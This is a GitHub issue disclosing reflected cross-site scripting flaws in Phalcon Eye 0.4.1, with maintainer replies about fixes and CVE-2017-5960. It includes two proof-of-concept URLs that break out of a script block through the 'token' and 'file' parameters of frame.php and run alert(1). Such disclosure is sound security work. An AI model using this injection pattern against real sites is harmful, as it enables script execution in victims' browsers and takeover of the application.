Phalcon Eye - Multiple Cross-Site Scripting (XSS) #133
Comments
|
Thanks for notify, I will publish fix for 0.4.1 and 0.5.0 branches.
How about PE-2017-0000001 ? |
|
Hi: Bests. |
|
Please note that is not a CVE assignment. It should be treated as a vendor-specific tracking ID. MITRE assigned CVE-2017-5960 to this. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Procuct: Phalcon Eye
Vendor: Phalcon (https://phalconphp.com/)
Vunlerable Version: 0.4.1 and probably prior
Tested Version: 0.4.1
Author: ADLab of Venustech
Advisory Details:
I have discovered Multiple Cross-Site Scripting (XSS) in Phalcon Eye, which can be exploited to add,modify or delete information in application`s database and gain complete control over the application.
The vulnerability exists due to insufficientfiltration of user-supplied data in multiple HTTP GET parameters passed to “phalconeye-master/phalconeye-master/public/external/pydio/plugins/editor.webodf/frame.php” url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website.
The exploitation examples below uses the "alert()" JavaScript function to see a pop-up messagebox:
(1)
http://localhost/testcmsofgithub/phalconeye-master/phalconeye-master/public/external/pydio/plugins/editor.webodf/frame.php?token=%22%22);}%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3Efunction%20nopfun(){//
(2)
http://localhost/testcmsofgithub/phalconeye-master/phalconeye-master/public/external/pydio/plugins/editor.webodf/frame.php?file=%22%22);}%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3Efunction%20nopfun(){//
The text was updated successfully, but these errors were encountered: